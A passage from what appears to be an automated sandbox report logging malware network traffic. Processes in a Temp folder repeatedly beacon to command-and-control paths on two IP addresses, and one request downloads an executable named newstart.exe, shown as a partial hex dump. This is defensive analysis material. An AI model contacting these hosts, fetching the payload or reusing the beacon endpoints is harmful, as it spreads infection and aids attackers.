                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:46.398917913 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:46 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        113192.168.2.559088185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:46.520000935 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:47.179228067 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:47 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        114192.168.2.559089185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:47.201240063 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:48.029359102 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:47 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        115192.168.2.559090185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:48.144380093 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:48.786211967 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:48 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        116192.168.2.559091185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:48.802939892 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:49.439590931 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:49 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        117192.168.2.559092185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:49.551429987 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:50.186499119 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:50 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        118192.168.2.559093185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:50.197772026 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:50.834534883 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:50 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        119192.168.2.559094185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:50.956859112 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:51.656619072 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:51 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        120192.168.2.55909577.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:51.627186060 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 65 30 3d 31 30 30 30 32 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: e0=1000238001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:52.332895041 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:52 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        121192.168.2.559096185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:51.668514013 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:52.333561897 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:52 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        122192.168.2.55909777.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:52.344425917 CEST54OUTGET /lend/newstart.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.037522078 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:52 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 304128
                                                                                                                                                                                                                                        Last-Modified: Thu, 11 Jul 2024 22:56:50 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "66906332-4a400"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c aa d7 91 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 02 00 00 d0 01 00 00 00 00 00 e2 9f 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 9f 02 00 4f 00 00 00 00 00 03 00 cc c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 0c 00 00 00 74 9f 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0 @ @Ot H.text `.rsrc@@.reloc@B
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.037544012 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 9f 02 00 00 00 00 00 48 00 00 00 02 00 05 00 50 2a 01 00 6c 74 01 00 03 00 00
                                                                                                                                                                                                                                        Data Ascii: HP*ltK01s%~%-&~[s&%(+o(8o)%rprYp~*(+
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.037586927 CEST1236INData Raw: 0a 7e d5 02 00 04 25 2d 17 26 7e cc 02 00 04 fe 06 63 03 00 06 73 48 00 00 0a 25 80 d5 02 00 04 28 06 00 00 2b 6f 63 01 00 06 00 11 07 11 06 fe 06 57 03 00 06 73 49 00 00 0a 7e d6 02 00 04 25 2d 17 26 7e cc 02 00 04 fe 06 64 03 00 06 73 4a 00 00
                                                                                                                                                                                                                                        Data Ascii: ~%-&~csH%(+ocWsI~%-&~dsJ%(+oeXsK~%-&~esL%(+oi(+,dsk%o]%rp(7o_%sNoa%og%oi%sO
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.037610054 CEST672INData Raw: 11 07 11 07 6f 8a 01 00 06 28 44 00 00 0a 2d 09 11 07 6f 8a 01 00 06 2b 05 72 fd 02 00 70 6f 8b 01 00 06 00 11 07 11 07 6f 8c 01 00 06 28 44 00 00 0a 2d 09 11 07 6f 8c 01 00 06 2b 05 72 fd 02 00 70 6f 8d 01 00 06 00 11 07 11 07 6f 8e 01 00 06 28
                                                                                                                                                                                                                                        Data Ascii: o(D-o+rpoo(D-o+rpoo(D-o+rpoorp([,o\Xo:+*AdzJzR
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.037632942 CEST1236INData Raw: 00 00 de 06 13 0a 00 00 de 00 11 07 2d 03 14 2b 07 11 07 28 7f 01 00 06 28 44 00 00 0a 16 fe 01 13 0b 11 0b 2c 09 06 11 07 6f 61 00 00 0a 00 00 11 06 17 58 13 06 11 06 11 05 6f 12 01 00 06 fe 04 13 0c 11 0c 3a a9 fe ff ff 00 de 05 26 00 00 de 00
                                                                                                                                                                                                                                        Data Ascii: -+((D,oaXo:&+*AL`m-0sO%(YsZ(U(V,A
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.037674904 CEST1236INData Raw: 00 00 2b 28 0c 00 00 2b 13 07 11 07 11 05 11 06 28 8c 00 00 06 0a 00 2b 10 00 02 16 14 28 14 00 00 06 6f 57 00 00 0a 0a 00 00 de 06 13 08 00 00 de 00 06 13 09 2b 00 11 09 2a 00 01 10 00 00 00 00 07 00 ce d5 00 06 1a 00 00 01 1b 30 05 00 89 01 00
                                                                                                                                                                                                                                        Data Ascii: +(+(+(oW+*0~*~*%rpo<iY(+(+8,Erp(o%q(YsZ(U(V,8X8,8
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.037689924 CEST448INData Raw: 06 0a 00 00 02 6f 7f 00 00 0a 6f 81 00 00 0a 0b 38 ca 00 00 00 07 6f 82 00 00 0a 74 23 00 00 01 0c 00 08 6f 83 00 00 0a 72 e3 03 00 70 28 84 00 00 0a 0d 09 2c 0d 06 08 6f 85 00 00 0a 6f 8b 01 00 06 00 08 6f 83 00 00 0a 72 ed 03 00 70 28 84 00 00
                                                                                                                                                                                                                                        Data Ascii: oo8ot#orp(,ooorp(,orpo(oorp(,ooorp(,/(voohooi(jokooT:+u$
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.037703991 CEST1236INData Raw: 00 00 00 00 00 00 00 22 02 28 87 00 00 0a 00 2a 00 00 00 1b 30 0a 00 8a 01 00 00 0d 00 00 11 00 73 25 00 00 0a 0a 00 00 02 6f 28 00 00 0a 0b 38 4c 01 00 00 07 6f 29 00 00 0a 0c 00 00 08 28 77 00 00 0a 0d 00 09 18 17 17 8d a3 00 00 01 25 16 28 76
                                                                                                                                                                                                                                        Data Ascii: "(*0s%o(8Lo)(w%(v%(YsZrp~*(+(uok(o,8(-s.(/o0(o1-(+((2,+tsk%o]
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.037729979 CEST1236INData Raw: 25 d0 66 02 00 04 28 59 00 00 0a 73 5a 00 00 0a 28 84 00 00 0a 0c 08 2c 06 07 17 9a 0a 2b 04 07 16 9a 0a 00 de 05 26 00 00 de 00 06 0d 2b 00 09 2a 00 00 01 10 00 00 00 00 07 00 6c 73 00 05 13 00 00 01 1b 30 06 00 f3 02 00 00 10 00 00 11 00 73 4e
                                                                                                                                                                                                                                        Data Ascii: %f(YsZ(,+&+*ls0sN(%(YsZr)p~*(+%(YsZr3p~*(+(7(Uso,t8R%r;p%r;p%r;p
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.037754059 CEST448INData Raw: 00 00 00 13 00 00 11 00 73 97 00 00 0a 0a 28 98 00 00 0a 02 6f 67 00 00 0a 0b 06 07 6f 99 00 00 0a 28 17 00 00 06 72 f9 02 00 70 7e 2a 00 00 0a 6f 2b 00 00 0a 0c 2b 00 08 2a 00 13 30 03 00 ec 00 00 00 14 00 00 11 00 7e 2a 00 00 0a 0a 16 0b 38 c4
                                                                                                                                                                                                                                        Data Ascii: s(ogo(rp~*o++*0~*8o_c_, YAX(((7+(((7, YAX(((7+(((7Xo
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.042764902 CEST1236INData Raw: 00 00 11 00 02 03 fe 01 0a 06 2c 05 00 17 0b 2b 1d 02 2c 06 03 14 fe 01 2b 01 17 0c 08 2c 05 00 16 0b 2b 0a 02 03 28 21 00 00 06 0b 2b 00 07 2a 00 00 00 13 30 02 00 0d 00 00 00 16 00 00 11 00 02 03 28 1b 00 00 06 0a 2b 00 06 2a 00 00 00 13 30 04
                                                                                                                                                                                                                                        Data Ascii: ,+,+,+(!+*0(+*0>ii,+%+Ya`-+*0-,+,+,+("+*0Cii


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        123192.168.2.559098185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:52.457739115 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.113257885 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:53 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        124192.168.2.559099185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.128470898 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.775257111 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:53 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
